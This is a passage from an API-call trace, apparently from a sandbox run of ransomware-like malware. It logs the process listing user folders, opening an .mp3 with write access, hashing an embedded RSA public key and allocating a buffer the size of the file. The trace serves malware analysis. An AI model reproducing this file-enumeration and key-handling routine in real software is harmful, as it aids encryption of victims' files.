dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0098.968] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0098.968] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0098.968] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0098.968] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0098.968] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.968] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0098.968] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.968] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.968] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.968] PathFindFileNameW (pszPath="") returned="" [0098.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0098.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0098.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0098.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.969] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0098.969] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0098.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0098.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.969] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.969] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.969] PathFindFileNameW (pszPath="") returned="" [0098.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0098.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0098.969] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.969] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c08d360, ftCreationTime.dwHighDateTime=0x1d5c37a, ftLastAccessTime.dwLowDateTime=0x798c8ca0, ftLastAccessTime.dwHighDateTime=0x1d5b6f3, ftLastWriteTime.dwLowDateTime=0x798c8ca0, ftLastWriteTime.dwHighDateTime=0x1d5b6f3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0i5A.mp3", cAlternateFileName="")) returned 1 [0098.969] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0i5A.mp3") returned=".mp3" [0098.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0i5A.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0i5a.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.969] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=93246) returned 1 [0098.969] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.972] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16c18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.973] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.973] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x16c3e, lpOverlapped=0x0) returned 1 [0098.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.974] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.974] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0098.975] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.975] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.975] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.976] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.976] GetLastError () returned 0x0 [0098.976] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.976] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0098.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.976] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.976] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.976] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c40) returned 0x9ba4d90 [0098.976] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d918 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d960 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.977] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331acd0 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331acb8 [0098.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.978] GetCurrentThreadId () returned 0x42c [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fd78 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.979] GetCurrentThreadId () returned 0x42c [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ace8 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0098.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0098.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 